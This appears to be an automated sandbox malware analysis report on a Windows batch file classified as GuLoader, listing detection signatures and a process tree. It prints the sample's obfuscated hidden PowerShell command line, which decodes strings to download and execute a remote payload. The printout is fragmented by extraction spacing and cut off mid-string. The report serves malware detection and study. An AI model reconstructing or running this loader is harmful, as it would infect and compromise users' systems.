Windows
Analysis Report
las.cmd
Overview
General Information
Detection
GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 3224 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\las.c md" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 3552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6100 cmdline:
powershell .exe -wind owstyle hi dden "$Van ddraabes = 1;$Precau tioning='S ub';$Preca utioning+= 'strin';$P recautioni ng+='g';Fu nction For fladigelse ns($Tusmrk ets152){$T sp=$Tusmrk ets152.Len gth-$Vandd raabes;For ($velours= 5;$velours -lt $Tsp; $velours+= 6){$Ventin +=$Tusmrke ts152.$Pre cautioning .Invoke( $ velours, $ Vanddraabe s);}$Venti n;}functio n Inddataf iler223($D orathea){. ($Rull) ($Dorathea );}$Gianth ood=Forfla digelsens ' Ame.MBir tho terszu nchaiEnepi lSynkrlRea ssaGasco/ Pan,5Gub.e . Stat0Sjl en Stab,(T ilh,WGod e iVilstn ko mpd UndeoS alpiwH lhe s Symp G n jaNSp,ciTR eam. maal1 genne0mate m.Euro,0 N orm;Hed,s HjnelW ieg fiPneu n O pfl6Preim4 induk;Clei s unc,nxDe con6 Glob4 Unbra;Stut t Krsenr.y bbjvMatri: Tende1F rk u2 Lejl1Un der.Impu.0 Gy,ur)ordr e redepGRe la.eStaalc rofokB,nh ao Cart/Cy ni2.ubdi0 Ag ic1.emi x0Re.ie0My rmi1Under0 yndi1 Lys t AnticF U nshiSylphr ur.nvePhot of Te to A kkox Stup/ Pleje1 Pur c2 Cela1Ko ,me.Enarb0 ,orca ';$V armepudes= Forfladige lsens ' am meUDelitsW atere.ejds rDemon- Un reALeap gH ennee Ultr nIrreftLan db ';$Rade rnes=Forfl adigelsens 'SpildhKr sustSotadt Preinp ,la msTillb:Sa tis/ Gust/ Shamew mer gwHierowGe nd..Scia s ResyeRein fn IndkdQu eevsDdsdop E cepaevan gcGyptoeEr nri.Offerc Unf.ioOv.r bmBrugs/Va ndepUnf lr Lsri.oSubs t/Censud P rehl.arak/ Mccar7Lina lyRdkriiUn pe,2Se,vif Dewwu ety ';$Kogles pillets=Fo rfladigels ens 'Flyvn >Overb ';$ Rull=Forfl adigelsens 'K emsiTv illeCampbx modul ';$H vervende=' Limpindene ';$Bondage s = Forfla digelsens 'Forvae,uc ulcPredohm ar,no Stan Hande%hvi dvaTrio,pC ampsp Unt dwhupoa ,n tetSprudaH yper% ieth \Te,tiPAns trrRestaeT ysseaSycon fNyklaf Fd eaiSecanrO ksekmPicay aB,saat Tu beiAttrivM unkeeMadag .OvercSUnd eppLapidoK .pit Dulge &Dimme& Be tu Aabene ViolcSaumo hzenogoCh, pp Godl,tR yota ';Ind datafiler2 23 (Forfla digelsens 'Ant a$San dwgFac,il, rojeo anaa bTrskeaBil frl Nons:C hl,rT Un,e rEjakuoVed umMissolM atche U.de nCircudL.l yaeOpsam= Ufor(B.lig cSmudsmfor tidBalka O ligo/Skri. c ,ype Kry sa$ gejrBT riano.enkr nUaf jdSip h.aAltingA egereGenfo sFlip,)Den si ');Indd atafiler22 3 (Forflad igelsens ' Ena $F ra lgForlalSt enloBryggb Nonea Un, tlHokus:Ra nomU udenn Creatf Udm uoUdr drDi atokE,dkke P,eendNmou snAz,cyeSa ftfsV.llas S.ces= A.p r$HaspeRFj .rnaSlui.d KommeUnd, frFillin T ubie Sttts Afde.Unhe lsMn.dep A no lTilrei C rpotRefl u(orgia$ S tjeKCorreo syningKate glBade eLa vtrsApporp R.turiHydr olherrel , apoeExempt InrolsDino s)A ato ') ;$Radernes =$Unforked ness[0];$Y ojuane= (F orfladigel sens '.irm a$DissogIn dfjl Bordo ForfebUnco naDonn lCe leb:IndicS Byggem Ban ipBilleiC. alisH.rskt un.eroMar, il .etreQu i krPres.n Boha.eK,rn